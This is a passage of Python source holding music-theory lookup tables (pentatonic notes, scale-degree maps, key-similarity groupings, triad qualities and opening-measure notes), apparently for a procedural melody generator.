'CsMinor': ['Cs', 'E', 'Fs', 'Gs', 'B' ],
'FsMinor': ['Fs', 'A', 'B', 'Cs', 'E' ],
'GMajor': ['G', 'A', 'B', 'D', 'E' ],
'COct': ['C', 'Cs', 'Ds', 'Fs', 'G' ],
'EMinor': ['E', 'G', 'A', 'B', 'D' ],
'DMinor': ['D', 'F', 'G', 'A', 'C' ],
'FMajor': ['F', 'G', 'A', 'C', 'D' ],
'CMinor': ['C', 'Ds', 'F', 'G', 'As' ],
'CsOct': ['Cs', 'D', 'E', 'G', 'Gs' ],
'CsMajor': ['Cs', 'Ds', 'F', 'Gs', 'As' ],
'DsMajor': ['Ds', 'F', 'G', 'As', 'C' ],
'GsMinor': ['Gs', 'B', 'Cs', 'Ds', 'Fs' ],
'BMajor': ['B', 'Cs', 'Ds', 'Fs', 'Gs' ],
'AsMinor': ['As', 'Cs', 'Ds', 'F', 'Gs' ],
'AsMajor': ['As', 'C', 'D', 'F', 'G' ],
'DsMinor': ['Ds', 'Fs', 'Gs', 'As', 'Cs' ],
'AMajor': ['A', 'B', 'Cs', 'E', 'Fs' ],
'FMinor': ['F', 'Gs', 'As', 'C', 'Ds' ],
'EMajor': ['E', 'Fs', 'Gs', 'B', 'Cs' ],
'CHMinor': ['C', 'Ds', 'F', 'G', 'B' ],
'GMinor': ['G', 'As', 'C', 'D', 'F' ],
'AMinor': ['A', 'C', 'D', 'E', 'G' ],
'FsMajor': ['Fs', 'Gs', 'As', 'Cs', 'Ds' ],
'DMajor': ['D', 'E', 'Fs', 'A', 'B' ],
}
# Pentatonic scale degrees for each key name.  Every major pentatonic uses
# diatonic degrees 1-2-3-5-6 and every minor pentatonic uses 1-3-4-5-7, so
# the table is generated from the key list instead of repeating the lists.
# Key order: the original entries first (preserving the historical iteration
# order), then the keys the old table was missing (BMajor, FsMajor, DMinor,
# DsMinor, AMinor) appended at the end -- a backward-compatible fix so that
# every key listed in AllKeys can be looked up without a KeyError.
Pentatonic = {
    key: ([1, 2, 3, 5, 6] if key.endswith('Major') else [1, 3, 4, 5, 7])
    for key in [
        'Minor', 'CMajor', 'DMajor', 'FMajor', 'EMajor', 'GMajor', 'AMajor',
        'CsMajor', 'AsMajor', 'GsMajor', 'DsMajor', 'Major',
        'CMinor', 'GMinor', 'BMinor', 'EMinor', 'FMinor', 'FsMinor',
        'CsMinor', 'GsMinor', 'AsMinor',
        # previously-missing keys, appended last:
        'BMajor', 'FsMajor', 'DMinor', 'DsMinor', 'AMinor',
    ]
}
# Key-name lists: one major and one minor key per chromatic root, in
# chromatic order.  AllKeys is all majors followed by all minors.
_chromatic_roots = ['C', 'Cs', 'D', 'Ds', 'E', 'F', 'Fs', 'G', 'Gs', 'A', 'As', 'B']
MinorKeys = [root + 'Minor' for root in _chromatic_roots]
MajorKeys = [root + 'Major' for root in _chromatic_roots]
AllKeys = MajorKeys + MinorKeys
# For each scale, the other scales grouped by how far a modulation to them
# "jumps": 'smallJump' (closely related), 'modJump' (moderately related) and
# 'bigJump' (distant).  NOTE(review): the groups overlap -- a scale can
# appear in both its own smallJump and modJump lists.
ScaleSimilarity = {
'CMajor' : {
'smallJump' : ['CMajor', 'GMajor', 'EMinor', 'DMinor', 'FMajor', 'AMinor'] ,
'modJump' : ['CMajor', 'DOct', 'BMinor', 'CArabic', 'FsMinor', 'GMajor', 'COct', 'EMinor', 'DMinor', 'FMajor', 'CMinor', 'CsOct', 'DsMajor', 'AsMajor', 'AMajor', 'CHMinor', 'GMinor', 'AMinor', 'DMajor'] ,
'bigJump' : ['GsMajor', 'CsMinor', 'CsMajor', 'GsMinor', 'BMajor', 'AsMinor', 'DsMinor', 'FMinor', 'EMajor', 'FsMajor'] ,
},
'CsMajor' : {
'smallJump' : ['GsMajor', 'CsMajor', 'AsMinor', 'DsMinor', 'FMinor', 'FsMajor'] ,
'modJump' : ['GsMajor', 'DOct', 'CArabic', 'CsMinor', 'COct', 'CMinor', 'CsOct', 'CsMajor', 'DsMajor', 'GsMinor', 'BMajor', 'AsMinor', 'AsMajor', 'DsMinor', 'FMinor', 'EMajor', 'CHMinor', 'GMinor', 'FsMajor'] ,
'bigJump' : ['CMajor', 'BMinor', 'FsMinor', 'GMajor', 'EMinor', 'DMinor', 'FMajor', 'AMajor', 'AMinor', 'DMajor'] ,
},
'DMajor' : {
'smallJump' : ['BMinor', 'FsMinor', 'GMajor', 'EMinor', 'AMajor', 'DMajor'] ,
'modJump' : ['CMajor', 'DOct', 'BMinor', 'CArabic', 'CsMinor', 'FsMinor', 'GMajor', 'COct', 'EMinor', 'DMinor', 'FMajor', 'CsOct', 'GsMinor', 'BMajor', 'AMajor', 'EMajor', 'AMinor', 'DMajor'] ,
'bigJump' : ['GsMajor', 'CMinor', 'CsMajor', 'DsMajor', 'AsMinor', 'AsMajor', 'DsMinor', 'FMinor', 'CHMinor', 'GMinor', 'FsMajor'] ,
},
'DsMajor' : {
'smallJump' : ['GsMajor', 'CMinor', 'DsMajor', 'AsMajor', 'FMinor', 'CHMinor', 'GMinor'] ,
'modJump' : ['GsMajor', 'CMajor', 'DOct', 'CArabic', 'COct', 'DMinor', 'FMajor', 'CMinor', 'CsOct', 'CsMajor', 'DsMajor', 'AsMinor', 'AsMajor', 'DsMinor', 'FMinor', 'CHMinor', 'GMinor', 'AMinor', 'FsMajor'] ,
'bigJump' : ['BMinor', 'CsMinor', 'FsMinor', 'GMajor', 'EMinor', 'GsMinor', 'BMajor', 'AMajor', 'EMajor', 'DMajor'] ,
},
'EMajor' : {
'smallJump' : ['CsMinor', 'FsMinor', 'GsMinor', 'BMajor', 'AMajor', 'EMajor'] ,
'modJump' : ['DOct', 'BMinor', 'CArabic', 'CsMinor', 'FsMinor', 'GMajor', 'COct', 'EMinor', 'CsOct', 'CsMajor', 'GsMinor', 'BMajor', 'AsMinor', 'DsMinor', 'AMajor', 'EMajor', 'FsMajor', 'DMajor'] ,
'bigJump' : ['GsMajor', 'CMajor', 'DMinor', 'FMajor', 'CMinor', 'DsMajor', 'AsMajor', 'FMinor', 'CHMinor', 'GMinor', 'AMinor'] ,
},
'FMajor' : {
'smallJump' : ['CMajor', 'DMinor', 'FMajor', 'AsMajor', 'GMinor', 'AMinor'] ,
'modJump' : ['GsMajor', 'CMajor', 'DOct', 'BMinor', 'CArabic', 'GMajor', 'COct', 'EMinor', 'DMinor', 'FMajor', 'CMinor', 'CsOct', 'DsMajor', 'AsMajor', 'FMinor', 'CHMinor', 'GMinor', 'AMinor', 'DMajor'] ,
'bigJump' : ['CsMinor', 'FsMinor', 'CsMajor', 'GsMinor', 'BMajor', 'AsMinor', 'DsMinor', 'AMajor', 'EMajor', 'FsMajor'] ,
},
'FsMajor' : {
'smallJump' : ['CsMajor', 'GsMinor', 'BMajor', 'AsMinor', 'DsMinor', 'FsMajor'] ,
'modJump' : ['GsMajor', 'DOct', 'CArabic', 'CsMinor', 'FsMinor', 'COct', 'CMinor', 'CsOct', 'CsMajor', 'DsMajor', 'GsMinor', 'BMajor', 'AsMinor', 'DsMinor', 'AMajor', 'FMinor', 'EMajor', 'CHMinor', 'FsMajor'] ,
'bigJump' : ['CMajor', 'BMinor', 'GMajor', 'EMinor', 'DMinor', 'FMajor', 'AsMajor', 'GMinor', 'AMinor', 'DMajor'] ,
},
'GMajor' : {
'smallJump' : ['CMajor', 'BMinor', 'GMajor', 'EMinor', 'AMinor', 'DMajor'] ,
'modJump' : ['CMajor', 'DOct', 'BMinor', 'CArabic', 'CsMinor', 'FsMinor', 'GMajor', 'COct', 'EMinor', 'DMinor', 'FMajor', 'CsOct', 'AsMajor', 'AMajor', 'EMajor', 'CHMinor', 'GMinor', 'AMinor', 'DMajor'] ,
'bigJump' : ['GsMajor', 'CMinor', 'CsMajor', 'DsMajor', 'GsMinor', 'BMajor', 'AsMinor', 'DsMinor', 'FMinor', 'FsMajor'] ,
},
'GsMajor' : {
'smallJump' : ['GsMajor', 'CMinor', 'CsMajor', 'DsMajor', 'AsMinor', 'FMinor'] ,
'modJump' : ['GsMajor', 'DOct', 'CArabic', 'COct', 'DMinor', 'FMajor', 'CMinor', 'CsOct', 'CsMajor', 'DsMajor', 'GsMinor', 'BMajor', 'AsMinor', 'AsMajor', 'DsMinor', 'FMinor', 'CHMinor', 'GMinor', 'FsMajor'] ,
'bigJump' : ['CMajor', 'BMinor', 'CsMinor', 'FsMinor', 'GMajor', 'EMinor', 'AMajor', 'EMajor', 'AMinor', 'DMajor'] ,
},
'AMajor' : {
'smallJump' : ['BMinor', 'CsMinor', 'FsMinor', 'AMajor', 'EMajor', 'DMajor'] ,
'modJump' : ['CMajor', 'DOct', 'BMinor', 'CArabic', 'CsMinor', 'FsMinor', 'GMajor', 'COct', 'EMinor', 'CsOct', 'GsMinor', 'BMajor', 'DsMinor', 'AMajor', 'EMajor', 'AMinor', 'FsMajor', 'DMajor'] ,
'bigJump' : ['GsMajor', 'DMinor', 'FMajor', 'CMinor', 'CsMajor', 'DsMajor', 'AsMinor', 'AsMajor', 'FMinor', 'CHMinor', 'GMinor'] ,
},
'AsMajor' : {
'smallJump' : ['DMinor', 'FMajor', 'CMinor', 'DsMajor', 'AsMajor', 'GMinor'] ,
'modJump' : ['GsMajor', 'CMajor', 'DOct', 'GMajor', 'COct', 'EMinor', 'DMinor', 'FMajor', 'CMinor', 'CsOct', 'CsMajor', 'DsMajor', 'AsMinor', 'AsMajor', 'FMinor', 'CHMinor', 'GMinor', 'AMinor'] ,
'bigJump' : ['BMinor', 'CArabic', 'CsMinor', 'FsMinor', 'GsMinor', 'BMajor', 'DsMinor', 'AMajor', 'EMajor', 'FsMajor', 'DMajor'] ,
},
'BMajor' : {
'smallJump' : ['CsMinor', 'GsMinor', 'BMajor', 'DsMinor', 'EMajor', 'FsMajor'] ,
'modJump' : ['GsMajor', 'DOct', 'BMinor', 'CArabic', 'CsMinor', 'FsMinor', 'COct', 'CsOct', 'CsMajor', 'GsMinor', 'BMajor', 'AsMinor', 'DsMinor', 'AMajor', 'FMinor', 'EMajor', 'FsMajor', 'DMajor'] ,
'bigJump' : ['CMajor', 'GMajor', 'EMinor', 'DMinor', 'FMajor', 'CMinor', 'DsMajor', 'AsMajor', 'CHMinor', 'GMinor', 'AMinor'] ,
},
'CMinor' : {
'smallJump' : ['GsMajor', 'CMinor', 'DsMajor', 'AsMajor', 'FMinor', 'CHMinor', 'GMinor'] ,
'modJump' : ['GsMajor', 'CMajor', 'DOct', 'CArabic', 'COct', 'DMinor', 'FMajor', 'CMinor', 'CsOct', 'CsMajor', 'DsMajor', 'AsMinor', 'AsMajor', 'DsMinor', 'FMinor', 'CHMinor', 'GMinor', 'AMinor', 'FsMajor'] ,
'bigJump' : ['BMinor', 'CsMinor', 'FsMinor', 'GMajor', 'EMinor', 'GsMinor', 'BMajor', 'AMajor', 'EMajor', 'DMajor'] ,
},
'CsMinor' : {
'smallJump' : ['CsMinor', 'FsMinor', 'GsMinor', 'BMajor', 'AMajor', 'EMajor'] ,
'modJump' : ['DOct', 'BMinor', 'CArabic', 'CsMinor', 'FsMinor', 'GMajor', 'COct', 'EMinor', 'CsOct', 'CsMajor', 'GsMinor', 'BMajor', 'AsMinor', 'DsMinor', 'AMajor', 'EMajor', 'FsMajor', 'DMajor'] ,
'bigJump' : ['GsMajor', 'CMajor', 'DMinor', 'FMajor', 'CMinor', 'DsMajor', 'AsMajor', 'FMinor', 'CHMinor', 'GMinor', 'AMinor'] ,
},
'DMinor' : {
'smallJump' : ['CMajor', 'DMinor', 'FMajor', 'AsMajor', 'GMinor', 'AMinor'] ,
'modJump' : ['GsMajor', 'CMajor', 'DOct', 'BMinor', 'CArabic', 'GMajor', 'COct', 'EMinor', 'DMinor', 'FMajor', 'CMinor', 'CsOct', 'DsMajor', 'AsMajor', 'FMinor', 'CHMinor', 'GMinor', 'AMinor', 'DMajor'] ,
'bigJump' : ['CsMinor', 'FsMinor', 'CsMajor', 'GsMinor', 'BMajor', 'AsMinor', 'DsMinor', 'AMajor', 'EMajor', 'FsMajor'] ,
},
'DsMinor' : {
'smallJump' : ['CsMajor', 'GsMinor', 'BMajor', 'AsMinor', 'DsMinor', 'FsMajor'] ,
'modJump' : ['GsMajor', 'DOct', 'CArabic', 'CsMinor', 'FsMinor', 'COct', 'CMinor', 'CsOct', 'CsMajor', 'DsMajor', 'GsMinor', 'BMajor', 'AsMinor', 'DsMinor', 'AMajor', 'FMinor', 'EMajor', 'CHMinor', 'FsMajor'] ,
'bigJump' : ['CMajor', 'BMinor', 'GMajor', 'EMinor', 'DMinor', 'FMajor', 'AsMajor', 'GMinor', 'AMinor', 'DMajor'] ,
},
'EMinor' : {
'smallJump' : ['CMajor', 'BMinor', 'GMajor', 'EMinor', 'AMinor', 'DMajor'] ,
'modJump' : ['CMajor', 'DOct', 'BMinor', 'CArabic', 'CsMinor', 'FsMinor', 'GMajor', 'COct', 'EMinor', 'DMinor', 'FMajor', 'CsOct', 'AsMajor', 'AMajor', 'EMajor', 'CHMinor', 'GMinor', 'AMinor', 'DMajor'] ,
'bigJump' : ['GsMajor', 'CMinor', 'CsMajor', 'DsMajor', 'GsMinor', 'BMajor', 'AsMinor', 'DsMinor', 'FMinor', 'FsMajor'] ,
},
'FMinor' : {
'smallJump' : ['GsMajor', 'CMinor', 'CsMajor', 'DsMajor', 'AsMinor', 'FMinor'] ,
'modJump' : ['GsMajor', 'DOct', 'CArabic', 'COct', 'DMinor', 'FMajor', 'CMinor', 'CsOct', 'CsMajor', 'DsMajor', 'GsMinor', 'BMajor', 'AsMinor', 'AsMajor', 'DsMinor', 'FMinor', 'CHMinor', 'GMinor', 'FsMajor'] ,
'bigJump' : ['CMajor', 'BMinor', 'CsMinor', 'FsMinor', 'GMajor', 'EMinor', 'AMajor', 'EMajor', 'AMinor', 'DMajor'] ,
},
'FsMinor' : {
'smallJump' : ['BMinor', 'CsMinor', 'FsMinor', 'AMajor', 'EMajor', 'DMajor'] ,
'modJump' : ['CMajor', 'DOct', 'BMinor', 'CArabic', 'CsMinor', 'FsMinor', 'GMajor', 'COct', 'EMinor', 'CsOct', 'GsMinor', 'BMajor', 'DsMinor', 'AMajor', 'EMajor', 'AMinor', 'FsMajor', 'DMajor'] ,
'bigJump' : ['GsMajor', 'DMinor', 'FMajor', 'CMinor', 'CsMajor', 'DsMajor', 'AsMinor', 'AsMajor', 'FMinor', 'CHMinor', 'GMinor'] ,
},
'GMinor' : {
'smallJump' : ['DMinor', 'FMajor', 'CMinor', 'DsMajor', 'AsMajor', 'GMinor'] ,
'modJump' : ['GsMajor', 'CMajor', 'DOct', 'GMajor', 'COct', 'EMinor', 'DMinor', 'FMajor', 'CMinor', 'CsOct', 'CsMajor', 'DsMajor', 'AsMinor', 'AsMajor', 'FMinor', 'CHMinor', 'GMinor', 'AMinor'] ,
'bigJump' : ['BMinor', 'CArabic', 'CsMinor', 'FsMinor', 'GsMinor', 'BMajor', 'DsMinor', 'AMajor', 'EMajor', 'FsMajor', 'DMajor'] ,
},
'GsMinor' : {
'smallJump' : ['CsMinor', 'GsMinor', 'BMajor', 'DsMinor', 'EMajor', 'FsMajor'] ,
'modJump' : ['GsMajor', 'DOct', 'BMinor', 'CArabic', 'CsMinor', 'FsMinor', 'COct', 'CsOct', 'CsMajor', 'GsMinor', 'BMajor', 'AsMinor', 'DsMinor', 'AMajor', 'FMinor', 'EMajor', 'FsMajor', 'DMajor'] ,
'bigJump' : ['CMajor', 'GMajor', 'EMinor', 'DMinor', 'FMajor', 'CMinor', 'DsMajor', 'AsMajor', 'CHMinor', 'GMinor', 'AMinor'] ,
},
'AMinor' : {
'smallJump' : ['CMajor', 'GMajor', 'EMinor', 'DMinor', 'FMajor', 'AMinor'] ,
'modJump' : ['CMajor', 'DOct', 'BMinor', 'CArabic', 'FsMinor', 'GMajor', 'COct', 'EMinor', 'DMinor', 'FMajor', 'CMinor', 'CsOct', 'DsMajor', 'AsMajor', 'AMajor', 'CHMinor', 'GMinor', 'AMinor', 'DMajor'] ,
'bigJump' : ['GsMajor', 'CsMinor', 'CsMajor', 'GsMinor', 'BMajor', 'AsMinor', 'DsMinor', 'FMinor', 'EMajor', 'FsMajor'] ,
},
'AsMinor' : {
'smallJump' : ['GsMajor', 'CsMajor', 'AsMinor', 'DsMinor', 'FMinor', 'FsMajor'] ,
'modJump' : ['GsMajor', 'DOct', 'CArabic', 'CsMinor', 'COct', 'CMinor', 'CsOct', 'CsMajor', 'DsMajor', 'GsMinor', 'BMajor', 'AsMinor', 'AsMajor', 'DsMinor', 'FMinor', 'EMajor', 'CHMinor', 'GMinor', 'FsMajor'] ,
'bigJump' : ['CMajor', 'BMinor', 'FsMinor', 'GMajor', 'EMinor', 'DMinor', 'FMajor', 'AMajor', 'AMinor', 'DMajor'] ,
},
'BMinor' : {
'smallJump' : ['BMinor', 'FsMinor', 'GMajor', 'EMinor', 'AMajor', 'DMajor'] ,
'modJump' : ['CMajor', 'DOct', 'BMinor', 'CArabic', 'CsMinor', 'FsMinor', 'GMajor', 'COct', 'EMinor', 'DMinor', 'FMajor', 'CsOct', 'GsMinor', 'BMajor', 'AMajor', 'EMajor', 'AMinor', 'DMajor'] ,
'bigJump' : ['GsMajor', 'CMinor', 'CsMajor', 'DsMajor', 'AsMinor', 'AsMajor', 'DsMinor', 'FMinor', 'CHMinor', 'GMinor', 'FsMajor'] ,
},
'COct' : {
'smallJump' : ['COct'] ,
'modJump' : ['GsMajor', 'BMinor', 'CsMinor', 'GMajor', 'COct', 'EMinor', 'DMinor', 'FMajor', 'CsMajor', 'GsMinor', 'BMajor', 'AsMinor', 'AsMajor', 'FMinor', 'EMajor', 'GMinor', 'DMajor'] ,
'bigJump' : ['CMajor', 'DOct', 'CArabic', 'FsMinor', 'CMinor', 'CsOct', 'DsMajor', 'DsMinor', 'AMajor', 'CHMinor', 'AMinor', 'FsMajor'] ,
},
'DOct' : {
'smallJump' : ['DOct'] ,
'modJump' : ['CMajor', 'DOct', 'CsMinor', 'FsMinor', 'GMajor', 'EMinor', 'CMinor', 'CsMajor', 'DsMajor', 'AsMinor', 'AsMajor', 'DsMinor', 'AMajor', 'EMajor', 'CHMinor', 'GMinor', 'AMinor', 'FsMajor'] ,
'bigJump' : ['GsMajor', 'BMinor', 'CArabic', 'COct', 'DMinor', 'FMajor', 'CsOct', 'GsMinor', 'BMajor', 'FMinor', 'DMajor'] ,
},
'CsOct' : {
'smallJump' : ['CsOct'] ,
'modJump' : ['GsMajor', 'CMajor', 'BMinor', 'CArabic', 'FsMinor', 'DMinor', 'FMajor', 'CMinor', 'CsOct', 'DsMajor', 'GsMinor', 'BMajor', 'DsMinor', 'AMajor', 'FMinor', 'CHMinor', 'AMinor', 'FsMajor', 'DMajor'] ,
'bigJump' : ['DOct', 'CsMinor', 'GMajor', 'COct', 'EMinor', 'CsMajor', 'AsMinor', 'AsMajor', 'EMajor', 'GMinor'] ,
},
'CArabic' : {
'smallJump' : ['CArabic', 'CsOct'] ,
'modJump' : ['GsMajor', 'CMajor', 'DOct', 'BMinor', 'CArabic', 'CsMinor', 'FsMinor', 'GMajor', 'COct', 'EMinor', 'DMinor', 'FMajor', 'CMinor', 'CsOct', 'CsMajor', 'DsMajor', 'GsMinor', 'BMajor', 'AsMinor', 'DsMinor', 'AMajor', 'FMinor', 'EMajor', 'CHMinor', 'AMinor', 'FsMajor', 'DMajor'] ,
'bigJump' : ['AsMajor', 'GMinor'] ,
},
'CHMinor' : {
'smallJump' : ['DOct', 'CMinor', 'DsMajor', 'CHMinor'] ,
'modJump' : ['GsMajor', 'CMajor', 'DOct', 'CArabic', 'GMajor', 'EMinor', 'DMinor', 'FMajor', 'CMinor', 'CsOct', 'CsMajor', 'DsMajor', 'AsMinor', 'AsMajor', 'DsMinor', 'FMinor', 'CHMinor', 'GMinor', 'AMinor', 'FsMajor'] ,
'bigJump' : ['BMinor', 'CsMinor', 'FsMinor', 'COct', 'GsMinor', 'BMajor', 'AMajor', 'EMajor', 'DMajor'] ,
},
}
# For each scale degree (1-7), the two degrees that stack with it into a
# triad: a third above (degree + 2) and a fifth above (degree + 4), both
# wrapped back into the 1-7 range.
AcceptableChords = {
    degree: {
        'acceptableNoteA': (degree + 1) % 7 + 1,
        'acceptableNoteB': (degree + 3) % 7 + 1,
    }
    for degree in range(1, 8)
}
# Scale degree on which the diminished triad sits, for the keys listed:
# degree 7 in the major keys, degree 2 in the minor keys.
DiminishedChord = {
    key: (7 if key.endswith('Major') else 2)
    for key in ('CMajor', 'GMajor', 'CMinor', 'AMajor', 'GsMajor',
                'GMinor', 'FMinor', 'BMinor', 'CsMinor', 'FsMinor',
                'GsMinor', 'AsMinor')
}
# Note name -> 1-based scale degree for every scale.  The octatonic ('Oct')
# scales carry eight degrees; all others carry seven.  This is the base
# table that the degree/note conversions elsewhere in the file mirror.
KeyDict = {
'CMajor': { 'C':1, 'D':2, 'E':3, 'F':4, 'G':5, 'A':6, 'B':7 },
'CsMajor': { 'Cs':1, 'Ds':2, 'F':3, 'Fs':4, 'Gs':5, 'As':6, 'C':7 },
'DMajor': { 'D':1, 'E':2, 'Fs':3, 'G':4, 'A':5, 'B':6, 'Cs':7 },
'DsMajor': { 'Ds':1, 'F':2, 'G':3, 'Gs':4, 'As':5, 'C':6, 'D':7 },
'EMajor': { 'E':1, 'Fs':2, 'Gs':3, 'A':4, 'B':5, 'Cs':6, 'Ds':7 },
'FMajor': { 'F':1, 'G':2, 'A':3, 'As':4, 'C':5, 'D':6, 'E':7 },
'FsMajor': { 'Fs':1, 'Gs':2, 'As':3, 'B':4, 'Cs':5, 'Ds':6, 'F':7 },
'GMajor': { 'G':1, 'A':2, 'B':3, 'C':4, 'D':5, 'E':6, 'Fs':7 },
'GsMajor': { 'Gs':1, 'As':2, 'C':3, 'Cs':4, 'Ds':5, 'F':6, 'G':7 },
'AMajor': { 'A':1, 'B':2, 'Cs':3, 'D':4, 'E':5, 'Fs':6, 'Gs':7 },
'AsMajor': { 'As':1, 'C':2, 'D':3, 'Ds':4, 'F':5, 'G':6, 'A':7 },
'BMajor': { 'B':1, 'Cs':2, 'Ds':3, 'E':4, 'Fs':5, 'Gs':6, 'As':7 },
'CMinor': { 'C':1, 'D':2, 'Ds':3, 'F':4, 'G':5, 'Gs':6, 'As':7 },
'CsMinor': { 'Cs':1, 'Ds':2, 'E':3, 'Fs':4, 'Gs':5, 'A':6, 'B':7 },
'DMinor': { 'D':1, 'E':2, 'F':3, 'G':4, 'A':5, 'As':6, 'C':7 },
'DsMinor': { 'Ds':1, 'F':2, 'Fs':3, 'Gs':4, 'As':5, 'B':6, 'Cs':7 },
'EMinor': { 'E':1, 'Fs':2, 'G':3, 'A':4, 'B':5, 'C':6, 'D':7 },
'FMinor': { 'F':1, 'G':2, 'Gs':3, 'As':4, 'C':5, 'Cs':6, 'Ds':7 },
'FsMinor': { 'Fs':1, 'Gs':2, 'A':3, 'B':4, 'Cs':5, 'D':6, 'E':7 },
'GMinor': { 'G':1, 'A':2, 'As':3, 'C':4, 'D':5, 'Ds':6, 'F':7 },
'GsMinor': { 'Gs':1, 'As':2, 'B':3, 'Cs':4, 'Ds':5, 'E':6, 'Fs':7 },
'AMinor': { 'A':1, 'B':2, 'C':3, 'D':4, 'E':5, 'F':6, 'G':7 },
'AsMinor': { 'As':1, 'C':2, 'Cs':3, 'Ds':4, 'F':5, 'Fs':6, 'Gs':7 },
'BMinor': { 'B':1, 'Cs':2, 'D':3, 'E':4, 'Fs':5, 'G':6, 'A':7 },
'COct': { 'C':1, 'Cs':2, 'Ds':3, 'E':4, 'Fs':5, 'G':6, 'A':7, 'As':8 },
'CsOct': { 'Cs':1, 'D':2, 'E':3, 'F':4, 'G':5, 'Gs':6, 'As':7, 'B':8 },
'DOct': { 'D':1, 'Ds':2, 'F':3, 'Fs':4, 'Gs':5, 'A':6, 'B':7, 'C':8 },
'CArabic': { 'C':1, 'Cs':2, 'E':3, 'F':4, 'G':5, 'Gs':6, 'B':7 },
'CHMinor': { 'C':1, 'D':2, 'Ds':3, 'F':4, 'G':5, 'Gs':6, 'B':7 },
}
#Reverse Key Dictionary: 1-based scale degree -> note name for every scale.
# Each scale's note->degree mapping in KeyDict is one-to-one, so this table
# is produced by inverting KeyDict rather than repeating the data by hand.
ReverseKeyDict = {
    scale: {degree: note for note, degree in mapping.items()}
    for scale, mapping in KeyDict.items()
}
#Notes in Scale: the note names of each scale in ascending degree order.
# KeyDict already lists every scale's notes in degree order, so this table
# is simply each scale's key list from KeyDict.
NotesInScale = {scale: list(mapping) for scale, mapping in KeyDict.items()}
# Quality of the triad ('Major', 'Minor' or 'Dim') built on each note of
# each scale.  The 'Oct' scales mark every note 'Major' and 'CArabic' marks
# every note 'Minor'.  NOTE(review): there is no 'CHMinor' entry here,
# unlike the other scale tables -- confirm callers never look it up.
NoteIntensity = {
'CMajor': { 'C':'Major', 'D':'Minor', 'E':'Minor', 'F':'Major', 'G':'Major', 'A':'Minor', 'B':'Dim' },
'CsMajor': { 'Cs':'Major', 'Ds':'Minor', 'F':'Minor', 'Fs':'Major', 'Gs':'Major', 'As':'Minor', 'C':'Dim' },
'DMajor': { 'D':'Major', 'E':'Minor', 'Fs':'Minor', 'G':'Major', 'A':'Major', 'B':'Minor', 'Cs':'Dim' },
'DsMajor': { 'Ds':'Major', 'F':'Minor', 'G':'Minor', 'Gs':'Major', 'As':'Major', 'C':'Minor', 'D':'Dim' },
'EMajor': { 'E':'Major', 'Fs':'Minor', 'Gs':'Minor', 'A':'Major', 'B':'Major', 'Cs':'Minor', 'Ds':'Dim' },
'FMajor': { 'F':'Major', 'G':'Minor', 'A':'Minor', 'As':'Major', 'C':'Major', 'D':'Minor', 'E':'Dim' },
'FsMajor': { 'Fs':'Major', 'Gs':'Minor', 'As':'Minor', 'B':'Major', 'Cs':'Major', 'Ds':'Minor', 'F':'Dim' },
'GMajor': { 'G':'Major', 'A':'Minor', 'B':'Minor', 'C':'Major', 'D':'Major', 'E':'Minor', 'Fs':'Dim' },
'GsMajor': { 'Gs':'Major', 'As':'Minor', 'C':'Minor', 'Cs':'Major', 'Ds':'Major', 'F':'Minor', 'G':'Dim' },
'AMajor': { 'A':'Major', 'B':'Minor', 'Cs':'Minor', 'D':'Major', 'E':'Major', 'Fs':'Minor', 'Gs':'Dim' },
'AsMajor': { 'As':'Major', 'C':'Minor', 'D':'Minor', 'Ds':'Major', 'F':'Major', 'G':'Minor', 'A':'Dim' },
'BMajor': { 'B':'Major', 'Cs':'Minor', 'Ds':'Minor', 'E':'Major', 'Fs':'Major', 'Gs':'Minor', 'As':'Dim' },
'CMinor': { 'C':'Minor', 'D':'Dim', 'Ds':'Major', 'F':'Minor', 'G':'Minor', 'Gs':'Major', 'As':'Major' },
'CsMinor': { 'Cs':'Minor', 'Ds':'Dim', 'E':'Major', 'Fs':'Minor', 'Gs':'Minor', 'A':'Major', 'B':'Major' },
'DMinor': { 'D':'Minor', 'E':'Dim', 'F':'Major', 'G':'Minor', 'A':'Minor', 'As':'Major', 'C':'Major' },
'DsMinor': { 'Ds':'Minor', 'F':'Dim', 'Fs':'Major', 'Gs':'Minor', 'As':'Minor', 'B':'Major', 'Cs':'Major' },
'EMinor': { 'E':'Minor', 'Fs':'Dim', 'G':'Major', 'A':'Minor', 'B':'Minor', 'C':'Major', 'D':'Major' },
'FMinor': { 'F':'Minor', 'G':'Dim', 'Gs':'Major', 'As':'Minor', 'C':'Minor', 'Cs':'Major', 'Ds':'Major' },
'FsMinor': { 'Fs':'Minor', 'Gs':'Dim', 'A':'Major', 'B':'Minor', 'Cs':'Minor', 'D':'Major', 'E':'Major' },
'GMinor': { 'G':'Minor', 'A':'Dim', 'As':'Major', 'C':'Minor', 'D':'Minor', 'Ds':'Major', 'F':'Major' },
'GsMinor': { 'Gs':'Minor', 'As':'Dim', 'B':'Major', 'Cs':'Minor', 'Ds':'Minor', 'E':'Major', 'Fs':'Major' },
'AMinor': { 'A':'Minor', 'B':'Dim', 'C':'Major', 'D':'Minor', 'E':'Minor', 'F':'Major', 'G':'Major' },
'AsMinor': { 'As':'Minor', 'C':'Dim', 'Cs':'Major', 'Ds':'Minor', 'F':'Minor', 'Fs':'Major', 'Gs':'Major' },
'BMinor': { 'B':'Minor', 'Cs':'Dim', 'D':'Major', 'E':'Minor', 'Fs':'Minor', 'G':'Major', 'A':'Major' },
'COct': { 'C':'Major', 'Cs':'Major', 'Ds':'Major', 'E':'Major', 'Fs':'Major', 'G':'Major', 'A':'Major', 'As':'Major' },
'CsOct': { 'Cs':'Major', 'D':'Major', 'E':'Major', 'F':'Major', 'G':'Major', 'Gs':'Major', 'As':'Major', 'B':'Major' },
'DOct': { 'D':'Major', 'Ds':'Major', 'F':'Major', 'Fs':'Major', 'Gs':'Major', 'A':'Major', 'B':'Major', 'C':'Major' },
'CArabic': { 'C':'Minor', 'Cs':'Minor', 'E':'Minor', 'F':'Minor', 'G':'Minor', 'Gs':'Minor', 'B':'Minor' },
}
# Mutable time-signature scratchpad; all fields start at 0 and are
# presumably filled in at runtime by the sequencing code -- TODO confirm
# where it is written.
tsInfo = {'resolution': 0, 'tsNumerator': 0, 'tsDenominator': 0, 'lenOfMeasure': 0, 'totalMeasures': 0 }
#First Measure Note List: candidate notes for the opening measure of each
# scale -- degrees 1, 4 and 5 (tonic, subdominant, dominant), except the
# octatonic ('Oct') scales which use degrees 1, 3, 5 and 7.  Derived from
# ReverseKeyDict instead of repeating the note names by hand.
FirstMeasureNotes = {
    scale: [degrees[d]
            for d in ((1, 3, 5, 7) if scale.endswith('Oct') else (1, 4, 5))]
    for scale, degrees in ReverseKeyDict.items()
}
# Root note -> chord tones, per scale.  Diatonic scales map each scale note
